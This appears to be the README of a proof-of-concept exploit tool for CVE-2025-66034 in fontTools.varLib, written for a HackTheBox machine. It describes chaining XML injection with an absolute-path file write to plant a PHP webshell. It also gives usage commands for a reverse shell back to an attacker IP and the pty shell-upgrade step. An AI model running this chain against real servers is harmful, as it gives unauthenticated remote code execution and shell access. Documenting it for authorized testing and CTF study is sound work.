
CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE PoC exploit for an Arbitrary File Write + XML Injection vulnerability in fontTools.varLib.
PoC exploit for an Arbitrary File Write + XML Injection vulnerability in
fontTools.varLibTested on HackTheBox — VarIaType
fontTools.varLib processes .designspace XML files to build variable fonts. Two weaknesses combine to achieve pre-auth RCE:
| # | Primitive | Detail |
|---|---|---|
| 1 | XML Injection via CDATA split | Attacker-controlled content inside <labelname> is written verbatim into the output font file body, allowing arbitrary data injection |
| 2 | Arbitrary File Write via os.path.join() bypass | The filename attribute of <variable-font> accepts an absolute path. When passed to os.path.join(), it discards the intended output directory and writes to any attacker-specified filesystem path |
Chaining both primitives allows writing a PHP webshell to a web-accessible path, achieving unauthenticated Remote Code Execution.
python3 font_varlib.py \
--ip <attacker-ip> \
--port <port> \
--upload http://target.htb/tools/variable-font-generator/process \
--webroot /var/www/portal.target.htb/public/files \
--shell http://portal.target.htb/files
| Flag | Description |
|---|---|
--ip | Attacker IP for the reverse shell callback |
--port | Listener port |
--upload | Full URL of the font processing endpoint (POST) |
--webroot | Server-side absolute path that maps to a web-accessible directory |
--shell | Base URL under which the webshell will be accessible |
--no-listen | Skip auto-listener — print manual commands instead |
--pwncat | Use pwncat-cs instead of nc (preferred if available) |
pip install requests fonttools
.ttf files (source-light.ttf, source-regular.ttf) are generated using fontTools.FontBuilder as required masters for the designspace.designspace — A crafted XML file is built with:
<labelname>filename of <variable-font>, bypassing output_dir via os.path.join().designspace + master fonts are POSTed to the processing endpoint.php file is requested, executing the reverse shell payloadpython3 -c 'import pty; pty.spawn("/bin/bash")' and sets TERM + stty for a fully interactive shell| Field | |
|---|---|
| CVE | CVE-2025-66034 |
| Affected component | fontTools.varLib |
| Impact | Unauthenticated Arbitrary File Write → Remote Code Execution |
| Context | Web application exposing font processing endpoint |
This tool is intended for authorized penetration testing and CTF use only. Do not run against systems you do not own or have explicit written permission to test.
by 4nuxd